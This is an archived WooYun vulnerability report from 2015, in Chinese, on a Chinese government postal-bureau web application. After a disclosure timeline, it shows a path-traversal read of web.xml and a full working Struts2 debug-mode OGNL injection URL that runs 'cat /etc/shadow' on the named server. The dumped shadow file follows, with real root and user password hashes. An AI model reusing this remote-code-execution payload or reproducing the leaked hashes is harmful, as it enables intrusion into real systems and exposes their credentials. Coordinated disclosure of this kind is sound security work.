乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-23: 细节已通知厂商并且等待厂商处理中 2015-04-28: 厂商已经确认,细节仅向厂商公开 2015-05-08: 细节向核心白帽子及相关领域专家公开 2015-05-18: 细节向普通白帽子公开 2015-05-28: 细节向实习白帽子公开 2015-06-12: 细节向公众公开
漏洞不是挖掘的,是发现的
网站:http://pfxzsp.spb.gov.cn/generalservice/login/login_qy.jsp发现有个用户指南下载查下源码
测试下/../../web.xml,发现服务端struts开启了调试模式
poc
http://pfxzsp.spb.gov.cn/generalservice/loginlog/downLoadAction.do?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%[email protected]@getRequest%28%29,%[email protected]@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/shadow%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[4000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29
下载文件
root:$6$IrcFu3W0xMVTF/OG$Xfq7aVSsdCwXMNyoxLcHQQVfa7hYjYuIxmIMeegs27KGY6heDDKhg1xQCpU2siIlusVuTmOzsiUIjEIvWIqgJ1:16226:0:99999:7:::bin:*:15980:0:99999:7:::daemon:*:15980:0:99999:7:::adm:*:15980:0:99999:7:::lp:*:15980:0:99999:7:::sync:*:15980:0:99999:7:::shutdown:*:15980:0:99999:7:::halt:*:15980:0:99999:7:::mail:*:15980:0:99999:7:::uucp:*:15980:0:99999:7:::operator:*:15980:0:99999:7:::games:*:15980:0:99999:7:::gopher:*:15980:0:99999:7:::ftp:*:15980:0:99999:7:::nobody:*:15980:0:99999:7:::dbus:!!:16226::::::vcsa:!!:16226::::::rpc:!!:16226:0:99999:7:::abrt:!!:16226::::::apache:!!:16226::::::rpcuser:!!:16226::::::nfsnobody:!!:16226::::::haldaemon:!!:16226::::::ntp:!!:16226::::::saslauth:!!:16226::::::postfix:!!:16226::::::tomcat:!!:16226::::::webalizer:!!:16226::::::sshd:!!:16226::::::tcpdump:!!:16226::::::oprofile:!!:16226::::::nms:$6$6QjRZIBj$yWrXSa.ktKQH9dnD2/x9KhWaBloC.IC7WwMTox6K9rQbkKbP6RtL5Zu3kG5xvFNXyM3pEPoRjwDZ3qc//drkF.:16373:0:99999:7:::
</code>
升级
危害等级:中
漏洞Rank:10
确认时间:2015-04-28 11:19
thanks
暂无